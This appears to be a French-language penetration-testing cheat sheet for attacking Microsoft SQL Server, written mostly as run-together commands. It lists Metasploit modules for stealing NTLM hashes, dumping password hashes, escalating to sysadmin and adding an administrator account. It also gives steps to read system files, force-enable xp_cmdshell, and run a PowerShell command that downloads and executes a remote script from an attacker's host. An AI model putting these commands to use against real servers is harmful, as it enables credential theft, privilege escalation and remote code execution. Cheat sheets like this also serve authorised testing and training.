#Vol de NTLMmsf>useauxiliary/admin/mssql/mssql_ntlm_stealer#Steal NTLM hash, before executing run Responder#Info gatheringmsf>useadmin/mssql/mssql_enummsf>useadmin/mssql/mssql_enum_domain_accountsmsf>useadmin/mssql/mssql_enum_sql_loginsmsf>useauxiliary/admin/mssql/mssql_findandsampledatamsf>useauxiliary/scanner/mssql/mssql_hashdumpmsf>useauxiliary/scanner/mssql/mssql_schemadumpmsf>useauxiliary/admin/mssql/mssql_findandsampledatamsf>useauxiliary/admin/mssql/mssql_idf#Privescmsf>useexploit/windows/mssql/mssql_linkcrawlermsf>useadmin/mssql/mssql_escalate_execute_as#If the user has IMPERSONATION privilege, this will try to escalatemsf>useadmin/mssql/mssql_escalate_dbowner#Escalate from db_owner to sysadmin#Execution de codemsf>useadmin/mssql/mssql_execmsf>useexploit/windows/mssql/mssql_payload#Ajouter un nouvel administrateur depuis une session meterpretermsf>usewindows/manage/mssql_local_auth_bypass
SELECT*FROMOPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
Exécution de code
Pour executer du code sur MSSQL, il faut que xp_cmdshell soit activé. Si il ne l'est pas, il est possible de forcer son activation avec les droits suffisants.
Vérification
> xp_cmdshell `whoami`;
> go
Activer xp_cmdshell
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell `whoami`;
> go
Forcer l'activation
> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
Téléchargement de fichier
> xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://<your ip>:<port>/script.ps1')";
> go